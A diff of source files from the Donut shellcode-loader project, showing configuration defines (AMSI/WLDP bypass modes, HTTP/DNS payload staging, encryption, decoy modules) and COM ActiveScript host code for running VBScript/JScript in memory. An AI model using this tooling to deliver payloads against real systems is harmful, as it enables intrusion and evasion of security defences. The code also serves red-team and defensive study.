70 #define DONUT_ERROR_MIXED_ASSEMBLY 20
71 #define DONUT_ERROR_HEADERS_INVALID 21
72 #define DONUT_ERROR_DECOY_INVALID 22
5773
5874 // target architecture
59 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
60 #define DONUT_ARCH_X86 1 // x86
61 #define DONUT_ARCH_X64 2 // AMD64
62 #define DONUT_ARCH_X84 3 // AMD64 + x86
75 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
76 #define DONUT_ARCH_X86 1 // x86
77 #define DONUT_ARCH_X64 2 // AMD64
78 #define DONUT_ARCH_X84 3 // AMD64 + x86
6379
6480 // module type
65 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
66 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
67 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
68 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
69 #define DONUT_MODULE_VBS 5 // VBScript
70 #define DONUT_MODULE_JS 6 // JavaScript or JScript
71 #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded
81 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
82 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
83 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
84 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
85 #define DONUT_MODULE_VBS 5 // VBScript
86 #define DONUT_MODULE_JS 6 // JavaScript or JScript
87
88 // format type
89 #define DONUT_FORMAT_BINARY 1
90 #define DONUT_FORMAT_BASE64 2
91 #define DONUT_FORMAT_C 3
92 #define DONUT_FORMAT_RUBY 4
93 #define DONUT_FORMAT_PYTHON 5
94 #define DONUT_FORMAT_POWERSHELL 6
95 #define DONUT_FORMAT_CSHARP 7
96 #define DONUT_FORMAT_HEX 8
97
98 // compression engine
99 #define DONUT_COMPRESS_NONE 1
100 #define DONUT_COMPRESS_APLIB 2
101 #define DONUT_COMPRESS_LZNT1 3 // COMPRESSION_FORMAT_LZNT1
102 #define DONUT_COMPRESS_XPRESS 4 // COMPRESSION_FORMAT_XPRESS
103
104 // entropy level
105 #define DONUT_ENTROPY_NONE 1 // don't use any entropy
106 #define DONUT_ENTROPY_RANDOM 2 // use random names
107 #define DONUT_ENTROPY_DEFAULT 3 // use random names + symmetric encryption
108
109 // misc options
110 #define DONUT_OPT_EXIT_THREAD 1 // return to the caller which calls RtlExitUserThread
111 #define DONUT_OPT_EXIT_PROCESS 2 // call RtlExitUserProcess to terminate host process
72112
73113 // instance type
74 #define DONUT_INSTANCE_PIC 1 // Self-contained
75 #define DONUT_INSTANCE_URL 2 // Download from remote server
114 #define DONUT_INSTANCE_EMBED 1 // Self-contained
115 #define DONUT_INSTANCE_HTTP 2 // Download from remote HTTP/HTTPS server
116 #define DONUT_INSTANCE_DNS 3 // Download from remote DNS server
76117
77118 // AMSI/WLDP options
78 #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP
79 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
80 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
81
82 // apparently C# can support 2^16 or 65,536 parameters
83 // we support up to eight for now :)
84 #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method
85 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
86 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
87 #define DONUT_MAX_URL 256
88 #define DONUT_MAX_MODNAME 8
89 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
90 #define DONUT_VER_LEN 32
91 #define DONUT_DOMAIN_LEN 8
119 #define DONUT_BYPASS_NONE 1 // Disables bypassing AMSI/WDLP
120 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
121 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
122
123 // Preserve PE headers options
124 #define DONUT_HEADERS_OVERWRITE 1 // Overwrite PE headers
125 #define DONUT_HEADERS_KEEP 1 // Preserve PE headers
126
127 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
128 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
129 #define DONUT_MAX_MODNAME 8
130 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
131 #define DONUT_VER_LEN 32
132 #define DONUT_DOMAIN_LEN 8
92133
93134 typedef struct _DONUT_CONFIG {
94 int arch; // target architecture for shellcode
95 int bypass; // bypass option for AMSI/WDLP
96 char domain[DONUT_MAX_NAME]; // name of domain to create for assembly
97 char cls[DONUT_MAX_NAME]; // name of class and optional namespace
98 char method[DONUT_MAX_NAME]; // name of method to execute
99 char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon
100 char file[DONUT_MAX_NAME]; // assembly to create module from
101 char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server
102 char runtime[DONUT_MAX_NAME]; // runtime version to use.
103 char modname[DONUT_MAX_NAME]; // name of module written to disk
104
105 int mod_type; // .NET EXE/DLL, VBS,JS,EXE,DLL,XSL
106 uint64_t mod_len; // size of DONUT_MODULE
107 void *mod; // points to donut module
108
109 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
110 uint64_t inst_len; // size of DONUT_INSTANCE
111 void *inst; // points to donut instance
112
113 uint64_t pic_len; // size of shellcode
114 void *pic; // points to PIC/shellcode
135 uint32_t len, zlen; // original length of input file and compressed length
136 // general / misc options for loader
137 int arch; // target architecture
138 int bypass; // bypass option for AMSI/WDLP
139 int headers; // preserve PE headers option
140 int compress; // engine to use when compressing file via RtlCompressBuffer
141 int entropy; // entropy/encryption level
142 int format; // output format for loader
143 int exit_opt; // return to caller or invoke RtlExitUserProcess to terminate the host process
144 int thread; // run entrypoint of unmanaged EXE as a thread. attempts to intercept calls to exit-related API
145 uint64_t oep; // original entrypoint of target host file
146
147 // files in/out
148 char input[DONUT_MAX_NAME]; // name of input file to read and load in-memory
149 char output[DONUT_MAX_NAME]; // name of output file to save loader
150
151 // .NET stuff
152 char runtime[DONUT_MAX_NAME]; // runtime version to use for CLR
153 char domain[DONUT_MAX_NAME]; // name of domain to create for .NET DLL/EXE
154 char cls[DONUT_MAX_NAME]; // name of class with optional namespace for .NET DLL
155 char method[DONUT_MAX_NAME]; // name of method or DLL function to invoke for .NET DLL and unmanaged DLL
156
157 // command line for DLL/EXE
158 char param[DONUT_MAX_NAME]; // command line to use for unmanaged DLL/EXE and .NET DLL/EXE
159 int unicode; // param is converted to UNICODE before being passed to DLL function
160
161 // module overloading stuff
162 char decoy[MAX_PATH * 2]; // path of decoy module
163
164 // HTTP staging information
165 char server[DONUT_MAX_NAME]; // points to root path of where module will be stored on remote http server
166 char auth[DONUT_MAX_NAME]; // username and password for web server
167 char modname[DONUT_MAX_NAME]; // name of module written to disk for http stager
168
169 // DONUT_MODULE
170 int mod_type; // VBS/JS/DLL/EXE
171 int mod_len; // size of DONUT_MODULE
172 void *mod; // points to DONUT_MODULE
173
174 // DONUT_INSTANCE
175 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_HTTP
176 int inst_len; // size of DONUT_INSTANCE
177 void *inst; // points to DONUT_INSTANCE
178
179 // shellcode generated from configuration
180 int pic_len; // size of loader/shellcode
181 void* pic; // points to loader/shellcode
115182 } DONUT_CONFIG, *PDONUT_CONFIG;
183
184 // function pointers
185 typedef int (__cdecl *DonutCreate_t)(PDONUT_CONFIG);
186 typedef int (__cdecl *DonutDelete_t)(PDONUT_CONFIG);
187 typedef const char* (__cdecl *DonutError_t)(int);
116188
117189 #ifdef __cplusplus
118190 extern "C" {
119191 #endif
120192
193 // prototypes
121194 int DonutCreate(PDONUT_CONFIG);
195 int DonutCreateWrapper(const char *);
122196 int DonutDelete(PDONUT_CONFIG);
197 const char* DonutError(int);
123198
124199 #ifdef __cplusplus
125200 }
+298
-0
loader/activescript.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize virtual function table
32 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this) {
33 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
34
35 // Initialize IUnknown
36 mas->site.lpVtbl->QueryInterface = ADR(LPVOID, ActiveScript_QueryInterface);
37 mas->site.lpVtbl->AddRef = ADR(LPVOID, ActiveScript_AddRef);
38 mas->site.lpVtbl->Release = ADR(LPVOID, ActiveScript_Release);
39
40 // Initialize IActiveScriptSite
41 mas->site.lpVtbl->GetLCID = ADR(LPVOID, ActiveScript_GetLCID);
42 mas->site.lpVtbl->GetItemInfo = ADR(LPVOID, ActiveScript_GetItemInfo);
43 mas->site.lpVtbl->GetDocVersionString = ADR(LPVOID, ActiveScript_GetDocVersionString);
44 mas->site.lpVtbl->OnScriptTerminate = ADR(LPVOID, ActiveScript_OnScriptTerminate);
45 mas->site.lpVtbl->OnStateChange = ADR(LPVOID, ActiveScript_OnStateChange);
46 mas->site.lpVtbl->OnScriptError = ADR(LPVOID, ActiveScript_OnScriptError);
47 mas->site.lpVtbl->OnEnterScript = ADR(LPVOID, ActiveScript_OnEnterScript);
48 mas->site.lpVtbl->OnLeaveScript = ADR(LPVOID, ActiveScript_OnLeaveScript);
49
50 mas->site.m_cRef = 0;
51 mas->inst = inst;
52 }
53
54 #ifdef DEBUG
55 // try resolve interface name for IID
56 PWCHAR iid2interface(PWCHAR riid) {
57 LSTATUS s;
58 HKEY hk;
59 WCHAR subkey[128];
60 static WCHAR name[128];
61 DWORD len = ARRAYSIZE(name);
62
63 // check under HKEY_CLASSES_ROOT\Interface\ for name
64
65 swprintf(subkey, ARRAYSIZE(subkey), L"Interface\\%s", riid) ;
66
67 s = SHGetValueW(
68 HKEY_CLASSES_ROOT,
69 subkey,
70 NULL,
71 0,
72 name,
73 &len);
74
75 if(s != ERROR_SUCCESS) return L"Not found";
76
77 return name;
78 }
79 #endif
80
81 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv) {
82 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
83
84 #ifdef DEBUG
85 OLECHAR *iid;
86 HRESULT hr;
87
88 hr = StringFromIID(riid, &iid);
89 if(hr == S_OK) {
90 DPRINT("IActiveScriptSite::QueryInterface(%ws (%ws))", iid, iid2interface(iid));
91 CoTaskMemFree(iid);
92 } else {
93 DPRINT("StringFromIID failed");
94 }
95 #endif
96
97 if(ppv == NULL) return E_POINTER;
98
99 // we implement the following interfaces
100 if(IsEqualIID(&mas->inst->xIID_IUnknown, riid) ||
101 IsEqualIID(&mas->inst->xIID_IActiveScriptSite, riid))
102 {
103 DPRINT("Returning interface to IActiveScriptSite");
104 *ppv = (LPVOID)this;
105 ActiveScript_AddRef(this);
106 return S_OK;
107 } else if(IsEqualIID(&mas->inst->xIID_IActiveScriptSiteWindow, riid)) {
108 DPRINT("Returning interface to IActiveScriptSiteWindow");
109 *ppv = (LPVOID)&mas->siteWnd;
110 ActiveScriptSiteWindow_AddRef(&mas->siteWnd);
111 return S_OK;
112 }
113 DPRINT("Returning E_NOINTERFACE");
114 *ppv = NULL;
115 return E_NOINTERFACE;
116 }
117
118 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this) {
119 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
120
121 _InterlockedIncrement(&mas->site.m_cRef);
122
123 DPRINT("IActiveScriptSite::AddRef : m_cRef : %i\n", mas->site.m_cRef);
124
125 return mas->site.m_cRef;
126 }
127
128 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this) {
129 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
130
131 ULONG ulRefCount = _InterlockedDecrement(&mas->site.m_cRef);
132
133 DPRINT("IActiveScriptSite::Release : m_cRef : %i\n", ulRefCount);
134 return ulRefCount;
135 }
136
137 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this,
138 LPCOLESTR objectName, DWORD dwReturnMask,
139 IUnknown **objPtr, ITypeInfo **ppti)
140 {
141 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
142
143 DPRINT("IActiveScriptSite::GetItemInfo(objectName=%p, dwReturnMask=%08lx)",
144 objectName, dwReturnMask);
145
146 if(dwReturnMask & SCRIPTINFO_ITYPEINFO) {
147 DPRINT("Caller is requesting SCRIPTINFO_ITYPEINFO.");
148 if(ppti == NULL) return E_POINTER;
149
150 mas->wscript.lpTypeInfo->lpVtbl->AddRef(mas->wscript.lpTypeInfo);
151 *ppti = mas->wscript.lpTypeInfo;
152 }
153
154 if(dwReturnMask & SCRIPTINFO_IUNKNOWN) {
155 DPRINT("Caller is requesting SCRIPTINFO_IUNKNOWN.");
156 if(objPtr == NULL) return E_POINTER;
157
158 mas->wscript.lpVtbl->AddRef(&mas->wscript);
159 *objPtr = (IUnknown*)&mas->wscript;
160 }
161
162 return S_OK;
163 }
164
165 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this,
166 IActiveScriptError *scriptError)
167 {
168 DPRINT("IActiveScriptSite::OnScriptError");
169
170 EXCEPINFO ei;
171 DWORD dwSourceContext = 0;
172 ULONG ulLineNumber = 0;
173 LONG ichCharPosition = 0;
174 HRESULT hr;
175
176 Memset(&ei, 0, sizeof(EXCEPINFO));
177
178 DPRINT("IActiveScriptError::GetExceptionInfo");
179 hr = scriptError->lpVtbl->GetExceptionInfo(scriptError, &ei);
180 if(hr == S_OK) {
181 DPRINT("IActiveScriptError::GetSourcePosition");
182 hr = scriptError->lpVtbl->GetSourcePosition(
183 scriptError, &dwSourceContext,
184 &ulLineNumber, &ichCharPosition);
185 if(hr == S_OK) {
186 DPRINT("JSError: %ws line[%d:%d]\n",
187 ei.bstrDescription, ulLineNumber, ichCharPosition);
188 }
189 }
190 return S_OK;
191 }
192
193 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *plcid) {
194 DPRINT("IActiveScriptSite::GetLCID");
195 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
196
197 *plcid = mas->inst->api.GetUserDefaultLCID();
198 return S_OK;
199 }
200
201 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version) {
202 DPRINT("IActiveScriptSite::GetDocVersionString");
203
204 return S_OK;
205 }
206
207 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this,
208 const VARIANT *pvr, const EXCEPINFO *pei)
209 {
210 DPRINT("IActiveScriptSite::OnScriptTerminate");
211
212 return S_OK;
213 }
214
215 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state) {
216 DPRINT("IActiveScriptSite::OnStateChange");
217
218 return S_OK;
219 }
220
221 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this) {
222 DPRINT("IActiveScriptSite::OnEnterScript");
223
224 return S_OK;
225 }
226
227 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this) {
228 DPRINT("IActiveScriptSite::OnLeaveScript");
229
230 return S_OK;
231 }
232
233
234 // ################################################# IActiveScriptSiteWindow ###############################################
235
236 // initialize virtual function table for this interface
237 static VOID ActiveScriptSiteWindow_New(PDONUT_INSTANCE inst, IActiveScriptSiteWindow *this) {
238 // Initialize IUnknown
239 this->lpVtbl->QueryInterface = ADR(LPVOID, ActiveScriptSiteWindow_QueryInterface);
240 this->lpVtbl->AddRef = ADR(LPVOID, ActiveScriptSiteWindow_AddRef);
241 this->lpVtbl->Release = ADR(LPVOID, ActiveScriptSiteWindow_Release);
242
243 // Initialize IActiveScriptSiteWindow
244 this->lpVtbl->GetWindow = ADR(LPVOID, ActiveScriptSiteWindow_GetWindow);
245 this->lpVtbl->EnableModeless = ADR(LPVOID, ActiveScriptSiteWindow_EnableModeless);
246
247 this->m_cRef = 0;
248 this->inst = inst;
249 }
250
251 static STDMETHODIMP ActiveScriptSiteWindow_QueryInterface(IActiveScriptSiteWindow *this, REFIID riid, void **ppv) {
252 OLECHAR *iid;
253 HRESULT hr;
254
255 DPRINT("ActiveScriptSiteWindow::QueryInterface");
256
257 if(ppv == NULL) return E_POINTER;
258
259 // we implement the following interfaces
260 if(IsEqualIID(&this->inst->xIID_IUnknown, riid) ||
261 IsEqualIID(&this->inst->xIID_IActiveScriptSiteWindow, riid))
262 {
263 DPRINT("Returning this interface");
264 *ppv = (LPVOID)this;
265 ActiveScriptSiteWindow_AddRef(this);
266 return S_OK;
267 }
268 DPRINT("Interface not supported");
269 *ppv = NULL;
270 return E_NOINTERFACE;
271 }
272
273 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_AddRef(IActiveScriptSiteWindow *this) {
274 _InterlockedIncrement(&this->m_cRef);
275
276 DPRINT("ActiveScriptSiteWindow::AddRef(%i)", this->m_cRef);
277
278 return this->m_cRef;
279 }
280
281 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_Release(IActiveScriptSiteWindow *this) {
282 ULONG ulRefCount = _InterlockedDecrement(&this->m_cRef);
283
284 DPRINT("ActiveScriptSiteWindow::Release(%i)", ulRefCount);
285
286 return ulRefCount;
287 }
288
289 static STDMETHODIMP ActiveScriptSiteWindow_GetWindow(IActiveScriptSiteWindow *iface, HWND *phwnd) {
290 DPRINT("ActiveScriptSiteWindow::GetWindow(phwnd=%p)", phwnd);
291 return E_NOTIMPL;
292 }
293
294 static STDMETHODIMP ActiveScriptSiteWindow_EnableModeless(IActiveScriptSiteWindow *iface, BOOL fEnable) {
295 DPRINT("ActiveScriptSiteWindow::EnableModeless(fEnable=%ws)", fEnable ? L"FALSE" : L"TRUE");
296 return E_NOTIMPL;
297 }
+450
-0
loader/activescript.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef IACTIVESCRIPT_H
32 #define IACTIVESCRIPT_H
33
34 #include "../include/donut.h"
35
36 // required to load and run VBS or JS files
37 typedef struct _IActiveScript IActiveScript;
38 typedef struct _IActiveScriptError IActiveScriptError;
39 typedef struct _IActiveScriptSite IActiveScriptSite;
40 typedef struct _IActiveScriptSiteWindow IActiveScriptSiteWindow;
41 typedef struct _IActiveScriptParse32 IActiveScriptParse32;
42 typedef struct _IActiveScriptParse64 IActiveScriptParse64;
43
44 typedef enum tagSCRIPTSTATE {
45 SCRIPTSTATE_UNINITIALIZED = 0,
46 SCRIPTSTATE_STARTED = 1,
47 SCRIPTSTATE_CONNECTED = 2,
48 SCRIPTSTATE_DISCONNECTED = 3,
49 SCRIPTSTATE_CLOSED = 4,
50 SCRIPTSTATE_INITIALIZED = 5
51 } SCRIPTSTATE;
52
53 typedef enum tagSCRIPTTHREADSTATE {
54 SCRIPTTHREADSTATE_NOTINSCRIPT = 0,
55 SCRIPTTHREADSTATE_RUNNING = 1
56 } SCRIPTTHREADSTATE;
57
58 #define SCRIPTTHREADID_CURRENT 0xFFFFFFFD // The currently executing thread.
59 #define SCRIPTTHREADID_BASE 0xFFFFFFFE // The base thread; that is, the thread in which the scripting engine was instantiated.
60 #define SCRIPTTHREADID_ALL 0xFFFFFFFF // All threads.
61
62 typedef DWORD SCRIPTTHREADID;
63
64 #define SCRIPTITEM_ISPERSISTENT 0x00000001
65 #define SCRIPTITEM_ISVISIBLE 0x00000002
66 #define SCRIPTITEM_ISSOURCE 0x00000004
67 #define SCRIPTITEM_GLOBALMEMBERS 0x00000008
68 #define SCRIPTITEM_EXISTS 0x00000080
69 #define SCRIPTITEM_MULTIINSTANCE 0x00000100
70 #define SCRIPTITEM_CODEONLY 0x00000200
71
72 #define SCRIPTTEXT_ISPERSISTENT 0x00000001
73 #define SCRIPTTEXT_ISVISIBLE 0x00000002
74 #define SCRIPTTEXT_ISEXPRESSION 0x00000020
75 #define SCRIPTTEXT_KEEPDEFINITIONS 0x00000040
76 #define SCRIPTTEXT_ALLOWEXECUTION 0x00000400
77 #define SCRIPTTEXT_ALL_FLAGS (SCRIPTTEXT_ISPERSISTENT | \
78 SCRIPTTEXT_ISVISIBLE | \
79 SCRIPTTEXT_ISEXPRESSION | \
80 SCRIPTTEXT_KEEPDEFINITIONS | \
81 SCRIPTTEXT_ALLOWEXECUTION)
82
83 #define SCRIPTTEXT_HOSTMANAGESSOURCE 0x00000080
84 #define SCRIPTINFO_IUNKNOWN 0x00000001
85 #define SCRIPTINFO_ITYPEINFO 0x00000002
86 #define SCRIPTINFO_ALL_FLAGS (SCRIPTINFO_IUNKNOWN | SCRIPTINFO_ITYPEINFO)
87
88 typedef struct IActiveScriptVtbl {
89 BEGIN_INTERFACE
90
91 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
92 IActiveScript * This,
93 /* [in] */ REFIID riid,
94 /* [annotation][iid_is][out] */
95 void **ppvObject);
96
97 ULONG ( STDMETHODCALLTYPE *AddRef )(
98 IActiveScript * This);
99
100 ULONG ( STDMETHODCALLTYPE *Release )(
101 IActiveScript * This);
102
103 HRESULT ( STDMETHODCALLTYPE *SetScriptSite )(
104 IActiveScript * This,
105 /* [in] */ IActiveScriptSite *pass);
106
107 HRESULT ( STDMETHODCALLTYPE *GetScriptSite )(
108 IActiveScript * This,
109 /* [in] */ REFIID riid,
110 /* [iid_is][out] */ void **ppvObject);
111
112 HRESULT ( STDMETHODCALLTYPE *SetScriptState )(
113 IActiveScript * This,
114 /* [in] */ SCRIPTSTATE ss);
115
116 HRESULT ( STDMETHODCALLTYPE *GetScriptState )(
117 IActiveScript * This,
118 /* [out] */ SCRIPTSTATE *pssState);
119
120 HRESULT ( STDMETHODCALLTYPE *Close )(
121 IActiveScript * This);
122
123 HRESULT ( STDMETHODCALLTYPE *AddNamedItem )(
124 IActiveScript * This,
125 /* [in] */ LPCOLESTR pstrName,
126 /* [in] */ DWORD dwFlags);
127
128 HRESULT ( STDMETHODCALLTYPE *AddTypeLib )(
129 IActiveScript * This,
130 /* [in] */ REFGUID rguidTypeLib,
131 /* [in] */ DWORD dwMajor,
132 /* [in] */ DWORD dwMinor,
133 /* [in] */ DWORD dwFlags);
134
135 HRESULT ( STDMETHODCALLTYPE *GetScriptDispatch )(
136 IActiveScript * This,
137 /* [in] */ LPCOLESTR pstrItemName,
138 /* [out] */ IDispatch **ppdisp);
139
140 HRESULT ( STDMETHODCALLTYPE *GetCurrentScriptThreadID )(
141 IActiveScript * This,
142 /* [out] */ SCRIPTTHREADID *pstidThread);
143
144 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadID )(
145 IActiveScript * This,
146 /* [in] */ DWORD dwWin32ThreadId,
147 /* [out] */ SCRIPTTHREADID *pstidThread);
148
149 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadState )(
150 IActiveScript * This,
151 /* [in] */ SCRIPTTHREADID stidThread,
152 /* [out] */ SCRIPTTHREADSTATE *pstsState);
153
154 HRESULT ( STDMETHODCALLTYPE *InterruptScriptThread )(
155 IActiveScript * This,
156 /* [in] */ SCRIPTTHREADID stidThread,
157 /* [in] */ const EXCEPINFO *pexcepinfo,
158 /* [in] */ DWORD dwFlags);
159
160 HRESULT ( STDMETHODCALLTYPE *Clone )(
161 IActiveScript * This,
162 /* [out] */ IActiveScript **ppscript);
163
164 END_INTERFACE
165 } IActiveScriptVtbl;
166
167 typedef struct _IActiveScript {
168 IActiveScriptVtbl *lpVtbl;
169 } ActiveScript;
170
171 typedef struct IActiveScriptParse32Vtbl {
172 BEGIN_INTERFACE
173
174 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
175 IActiveScriptParse32 * This,
176 /* [in] */ REFIID riid,
177 /* [annotation][iid_is][out] */
178 void **ppvObject);
179
180 ULONG ( STDMETHODCALLTYPE *AddRef )(
181 IActiveScriptParse32 * This);
182
183 ULONG ( STDMETHODCALLTYPE *Release )(
184 IActiveScriptParse32 * This);
185
186 HRESULT ( STDMETHODCALLTYPE *InitNew )(
187 IActiveScriptParse32 * This);
188
189 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
190 IActiveScriptParse32 * This,
191 /* [in] */ LPCOLESTR pstrDefaultName,
192 /* [in] */ LPCOLESTR pstrCode,
193 /* [in] */ LPCOLESTR pstrItemName,
194 /* [in] */ LPCOLESTR pstrSubItemName,
195 /* [in] */ LPCOLESTR pstrEventName,
196 /* [in] */ LPCOLESTR pstrDelimiter,
197 /* [in] */ DWORD dwSourceContextCookie,
198 /* [in] */ ULONG ulStartingLineNumber,
199 /* [in] */ DWORD dwFlags,
200 /* [out] */ BSTR *pbstrName,
201 /* [out] */ EXCEPINFO *pexcepinfo);
202
203 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
204 IActiveScriptParse32 * This,
205 /* [in] */ LPCOLESTR pstrCode,
206 /* [in] */ LPCOLESTR pstrItemName,
207 /* [in] */ IUnknown *punkContext,
208 /* [in] */ LPCOLESTR pstrDelimiter,
209 /* [in] */ DWORD dwSourceContextCookie,
210 /* [in] */ ULONG ulStartingLineNumber,
211 /* [in] */ DWORD dwFlags,
212 /* [out] */ VARIANT *pvarResult,
213 /* [out] */ EXCEPINFO *pexcepinfo);
214
215 END_INTERFACE
216 } IActiveScriptParse32Vtbl;
217
218 typedef struct _IActiveScriptParse32 {
219 IActiveScriptParse32Vtbl *lpVtbl;
220 } ActiveScriptParse32;
221
222 typedef struct IActiveScriptParse64Vtbl {
223 BEGIN_INTERFACE
224
225 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
226 IActiveScriptParse64 * This,
227 /* [in] */ REFIID riid,
228 /* [annotation][iid_is][out] */
229 void **ppvObject);
230
231 ULONG ( STDMETHODCALLTYPE *AddRef )(
232 IActiveScriptParse64 * This);
233
234 ULONG ( STDMETHODCALLTYPE *Release )(
235 IActiveScriptParse64 * This);
236
237 HRESULT ( STDMETHODCALLTYPE *InitNew )(
238 IActiveScriptParse64 * This);
239
240 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
241 IActiveScriptParse64 *This,
242 /* [in] */ LPCOLESTR pstrDefaultName,
243 /* [in] */ LPCOLESTR pstrCode,
244 /* [in] */ LPCOLESTR pstrItemName,
245 /* [in] */ LPCOLESTR pstrSubItemName,
246 /* [in] */ LPCOLESTR pstrEventName,
247 /* [in] */ LPCOLESTR pstrDelimiter,
248 /* [in] */ DWORDLONG dwSourceContextCookie,
249 /* [in] */ ULONG ulStartingLineNumber,
